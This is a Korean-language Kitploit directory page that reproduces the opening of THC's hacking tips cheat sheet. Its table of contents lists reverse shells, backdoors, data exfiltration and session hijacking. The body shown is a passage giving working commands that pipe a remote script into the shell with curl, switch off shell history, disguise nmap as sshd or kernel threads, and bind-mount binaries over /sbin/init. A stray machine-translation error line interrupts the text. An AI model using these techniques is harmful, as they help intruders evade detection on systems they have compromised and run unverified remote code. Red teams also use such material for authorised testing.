Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
thc-tips-tricks-hacks-cheat-sheet — 다양한 팁 & 트릭 | Kitploit
도구/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (Open Source Intelligence)Persistence MechanismsLateral MovementData ExfiltrationInformation GatheringPost-ExploitationPenetration TestingRed TeamingCurated Resources

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

다양한 팁 & 트릭

저장소 보기
3.9k471543개월 전Kitploit 검토 완료

THC가 즐겨 쓰는 팁, 트릭 & 해킹 (치트 시트)

https://thc.org/tips

우리가 즐겨 쓰는 트릭 모음입니다. 그중 상당수는 우리가 만든 것이 아닙니다. 우리는 단지 수집할 뿐입니다.

우리는 트릭이 왜 동작하는지에 대한 설명 없이 '있는 그대로' 보여줍니다. 어떻게, 왜 동작하는지 이해하려면 리눅스를 알아야 합니다.

트릭이 있나요? https://thc.org/ops에 참여하세요.

  1. Bash
    1. 해킹 셸 설정
    2. 명령어 숨기기
    3. 명령줄 옵션 숨기기
    4. 네트워크 연결 숨기기
    5. 일반 사용자로 프로세스 숨기기
    6. 루트 권한으로 프로세스 숨기기
    7. 스크립트 숨기기
    8. cat 명령에서 숨기기
    9. 별도의 로그 파일과 함께 병렬 실행
  2. SSH
    1. 거의 보이지 않는 SSH
    2. 하나의 SSH/TCP 연결을 통한 다중 셸
    3. SSH 터널
    4. SSH socks5 터널
    5. NAT 뒤 호스트로 SSH 접속
    6. ProxyJump를 통한 SSH 피벗
    7. 사용자로 SSHD 실행
  3. 네트워크
    1. 호스트 검색
    2. Tcpdump
    3. 터널 및 포워딩
      1. Raw TCP 리버스 포트
      2. HTTPS 리버스 포워딩
      3. iptables로 트래픽 바운싱
      4. 고스트 IP / IP 스푸핑
      5. 기타
    4. Socks 프록시를 통한 모든 도구 사용
    5. 공인 IP 주소 찾기
    6. 전 세계에서 접근 가능 여부 확인
    7. 열린 포트 확인/스캔
    8. 패스워드 해시 크래킹
    9. 패스워드 / 키 브루트포스
  4. 데이터 업로드/다운로드/유출
    1. 파일 인코딩/디코딩
    2. 복사 & 붙여넣기를 이용한 파일 전송
    3. tmux를 이용한 파일 전송
    4. screen을 이용한 파일 전송
    5. gs-netcat 및 sftp를 이용한 파일 전송
    6. HTTP를 이용한 파일 전송
    7. curl 없이 파일 다운로드
    8. rsync를 이용한 파일 전송
    9. 공개 덤프 사이트로 파일 전송
    10. WebDAV를 이용한 파일 전송
    11. 텔레그램으로 파일 전송
  5. 리버스 셸 / 덤 셸
    1. 리버스 셸
      1. gs-netcat 사용 (암호화)
      2. Bash 사용
      3. cURL 사용 (암호화)
      4. cURL 사용 (평문)
      5. OpenSSL 사용 (암호화)
      6. remote.moe 사용 (암호화)
      7. /dev/tcp 없이
      8. Python 사용
      9. Perl 사용
      10. PHP 사용
    2. 덤 셸 업그레이드
      1. 리버스 셸을 pty 셸로 업그레이드
      2. 리버스 셸을 완전 대화형 셸로 업그레이드
      3. socat을 이용한 리버스 셸 (완전 대화형)
  6. 백도어
    1. gs-netcat
    2. sshx.io
    3. 초소형 SSHD 백도어
    4. 전체 네트워크에 원격 접속
    5. 초소형 PHP 백도어
    6. 초소형 리버스 DNS 터널 백도어
    7. 로컬 루트 백도어
    8. 자가 추출 임플란트
  7. 호스트 정찰
  8. 셸 해킹
    1. 파일 분쇄 (안전한 삭제)
    2. 파일의 날짜 복원
    3. 로그 파일 정리
    4. 루트 권한이 없는 사용자로부터 파일 숨기기
    5. 파일을 불변(immutable)으로 만들기
    6. sudo/su 없이 사용자 전환
    7. 페이로드 난독화 및 암호화
    8. 파일 시스템을 건드리지 않고 백도어 배포
  9. 암호화
    1. 빠른 랜덤 패스워드 생성
    2. 리눅스 휴대용 암호화 파일 시스템
      1. cryptsetup
      2. EncFS
    3. 파일 암호화
  10. 세션 스니핑 및 하이재킹
    1. 사용자의 SHELL 세션 스니핑
    2. dtrace로 모든 SHELL 세션 스니핑
    3. eBPF로 모든 SHELL 세션 스니핑
    4. strace로 사용자의 SSH 또는 SSHD 세션 스니핑
    5. 래퍼 스크립트로 사용자의 나가는 SSH 세션 스니핑
    6. SSH-IT으로 사용자의 나가는 SSH 세션 스니핑
    7. 실행 중인 SSH 세션 하이재킹 / 탈취
  11. VPN 및 셸
    1. 일회용 루트 서버
    2. VPN/VPS 제공업체
  12. OSINT 정보 수집
  13. 기타
    1. 주요 도구
    2. 유용한 리눅스 명령어
    3. tmux 치트 시트
    4. 유용한 명령어
  14. 해커가 되는 방법
  15. 다른 사이트

1. Bash / 셸

1.i. 해킹 셸 설정 (bash):

BASH를 덜 시끄럽게 만듭니다. ~/.bash_history 및 다른 많은 것들을 비활성화합니다.```sh source <(curl -SsfL https://thc.org/hs)

대체 URL:```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

그리고 curl/wget이 없다면 surl을 사용하고 bin curl로 (임시) 설치된 curl을 사용하세요.```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

HackShell은 훨씬 더 많은 기능을 수행하지만 가장 중요한 것은 다음과 같습니다:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"

TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160

우리는 anew를 많이 사용하며, 이것은 빠른 해결 방법입니다:```shell xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; } which anew &>/dev/null || alias anew=xanew

보너스 팁:
" "(공백)으로 시작하는 명령도 [기록에 저장되지 않습니다](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces).```
$  id

1.ii. 명령 숨기기 / 데몬화하기

이것은 프로세스 이름만 숨깁니다. 명령줄 옵션도 숨기려면 zapper를 사용하세요.```shell (exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1/24) # Note the brackets '(' and ')'

'/usr/sbin/sshd'로 위장한 백그라운드 'nmap'을 시작합니다:```
(exec -a '/usr/sbin/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1/24 &>nmap.log &)

GNU screen 내에서 시작하세요:``` screen -dmS MyName nmap -Pn -F -n --open -oG - 10.0.2.1/24

Attach back to the nmap process

screen -x MyName

또는 바이너리를 새 이름으로 복사하세요:```sh
cd /dev/shm
cp "$(command -v nmap)" syslogd
PATH=.:$PATH syslogd -Pn -F -n --open -oG - 10.0.2.1/24

또는 바인드 마운트를 사용하여 (일시적으로) /sbin/init이 /dev/shm/nmap을 대신 가리키게 하세요:```shell mount -n --bind "$(command -v nmap)" /sbin/init

starting /sbin/init will instead execute nmap

(/sbin/init -Pn -f -n --open -oG - 10.0.2.1/24 &>nmap.log &)

<a id="zap"></a>
**1.iii. 명령줄 옵션 숨기기**

[zapper](https://github.com/hackerschoice/zapper)를 사용하세요:```sh
curl -fL -o zapper https://github.com/hackerschoice/zapper/releases/latest/download/zapper-linux-$(uname -m) && \
chmod 755 zapper

입력할 콘텐츠(chunk 25/494)가 제공되지 않았습니다. 번역할 원문을 다시 보내주시기 바랍니다.```sh

Start Nmap but zap all options and show it as 'klog' in the process list:

./zapper -a klog nmap -Pn -F -n --open -oG - 10.0.0.1/24

Started as a daemon and sshd-style name:

(./zapper -a 'sshd: root@pts/0' nmap -Pn -F -n --open -oG - 10.0.0.1/24 &>nmap.log &)

Replace the existing shell with tmux (with 'exec').

Then start and hide tmux and all further processes - as some kernel process:

exec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux

<a id="bash-hide-connection"></a>
**1.iv. 네트워크 연결 숨기기**

요령은 `netstat`을 가로채서 grep을 사용하여 우리의 연결을 필터링하는 것입니다. 이 예시는 포트 31337 _또는_ IP 1.2.3.4의 모든 연결을 필터링합니다. `ss`(netstat 대안)에도 동일하게 적용해야 합니다.

**방법 1 - ~/.bashrc의 bash 함수로 연결 숨기기**
도구 다운로드